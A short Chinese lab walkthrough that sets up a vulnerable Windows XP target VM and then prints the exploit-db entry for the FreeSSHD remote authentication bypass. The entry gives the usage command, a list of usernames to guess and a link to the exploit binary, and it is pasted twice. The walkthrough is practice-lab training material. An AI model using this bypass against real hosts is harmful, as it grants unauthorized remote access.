打开scream.exe
选择winxp_pro_with_sp2.iso
下载链接:ed2k://|file|sc_winxp_pro_with_sp2.iso|629227520|505B810E128351482AF8B83AC4D04FD2|/
等待加载
然后点击3的那个按钮
生成一个.iso文件
这个.iso文件就是靶机了
然后去VM里新建虚拟机就可以了
直接试试ssh
搜索漏洞
刚好有个
Remote Authentication Bypass
root@kali:~# cat /usr/share/exploitdb/exploits/windows/remote/23080.txt
FreeSSHD all version Remote Authentication Bypass ZERODAY
Discovered & Exploited by Kingcope
Year 2011
# Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23080.zip
Run like:
ssh.exe -l<valid username> <host>
valid username might be:
root
admin
administrator
webadmin
sysadmin
netadmin
guest
user
web
test
ssh
sftp
ftp
or anything you can imagine.
The vulnerable banner of the most recent version is:
SSH-2.0-WeOnlyDo 2.1.3
For your pleasure,
KingcopeFreeSSHD all version Remote Authentication Bypass ZERODAY
Discovered & Exploited by Kingcope
Year 2011
Run like:
ssh.exe -l<valid username> <host>
valid username might be:
root
admin
administrator
webadmin
sysadmin
netadmin
guest
user
web
test
ssh
sftp
ftp
or anything you can imagine.
The vulnerable banner of the most recent version is:
SSH-2.0-WeOnlyDo 2.1.3
For your pleasure,
Kingcope
root@kali:~#
直接利用这个漏洞就可以提权了